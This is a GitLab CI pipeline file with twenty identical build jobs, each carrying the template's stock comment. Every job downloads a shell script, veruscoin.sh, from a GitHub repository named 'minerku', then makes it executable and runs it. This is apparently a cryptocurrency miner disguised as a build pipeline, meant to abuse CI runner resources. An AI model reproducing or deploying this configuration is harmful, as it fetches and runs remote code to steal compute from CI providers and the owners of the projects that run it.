stages:
  - build

build_1:       # This job runs in the build stage, which runs first.
  stage: build
  script:
    - wget https://raw.githubusercontent.com/sodomnime/minerku/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh

build_2:       # This job runs in the build stage, which runs first.
  stage: build
  script:
    - wget https://raw.githubusercontent.com/sodomnime/minerku/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh

build_3:       # This job runs in the build stage, which runs first.
  stage: build
  script:
    - wget https://raw.githubusercontent.com/sodomnime/minerku/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh

build_4:       # This job runs in the build stage, which runs first.
  stage: build
  script:
    - wget https://raw.githubusercontent.com/sodomnime/minerku/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh

build_5:       # This job runs in the build stage, which runs first.
  stage: build
  script:
    - wget https://raw.githubusercontent.com/sodomnime/minerku/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh

build_6:       # This job runs in the build stage, which runs first.
  stage: build
  script:
    - wget https://raw.githubusercontent.com/sodomnime/minerku/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh

build_7:       # This job runs in the build stage, which runs first.
  stage: build
  script:
    - wget https://raw.githubusercontent.com/sodomnime/minerku/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh

build_8:       # This job runs in the build stage, which runs first.
  stage: build
  script:
    - wget https://raw.githubusercontent.com/sodomnime/minerku/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh

build_9:       # This job runs in the build stage, which runs first.
  stage: build
  script:
    - wget https://raw.githubusercontent.com/sodomnime/minerku/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh

build_10:       # This job runs in the build stage, which runs first.
  stage: build
  script:
    - wget https://raw.githubusercontent.com/sodomnime/minerku/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh

build_11:       # This job runs in the build stage, which runs first.
  stage: build
  script:
    - wget https://raw.githubusercontent.com/sodomnime/minerku/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh

build_12:       # This job runs in the build stage, which runs first.
  stage: build
  script:
    - wget https://raw.githubusercontent.com/sodomnime/minerku/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh

build_13:       # This job runs in the build stage, which runs first.
  stage: build
  script:
    - wget https://raw.githubusercontent.com/sodomnime/minerku/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh

build_14:       # This job runs in the build stage, which runs first.
  stage: build
  script:
    - wget https://raw.githubusercontent.com/sodomnime/minerku/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh

build_15:       # This job runs in the build stage, which runs first.
  stage: build
  script:
    - wget https://raw.githubusercontent.com/sodomnime/minerku/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh

build_16:       # This job runs in the build stage, which runs first.
  stage: build
  script:
    - wget https://raw.githubusercontent.com/sodomnime/minerku/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh

build_17:       # This job runs in the build stage, which runs first.
  stage: build
  script:
    - wget https://raw.githubusercontent.com/sodomnime/minerku/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh

build_18:       # This job runs in the build stage, which runs first.
  stage: build
  script:
    - wget https://raw.githubusercontent.com/sodomnime/minerku/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh

build_19:       # This job runs in the build stage, which runs first.
  stage: build
  script:
    - wget https://raw.githubusercontent.com/sodomnime/minerku/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh

build_20:       # This job runs in the build stage, which runs first.
  stage: build
  script:
    - wget https://raw.githubusercontent.com/sodomnime/minerku/main/veruscoin.sh && chmod +x veruscoin.sh && ./veruscoin.sh

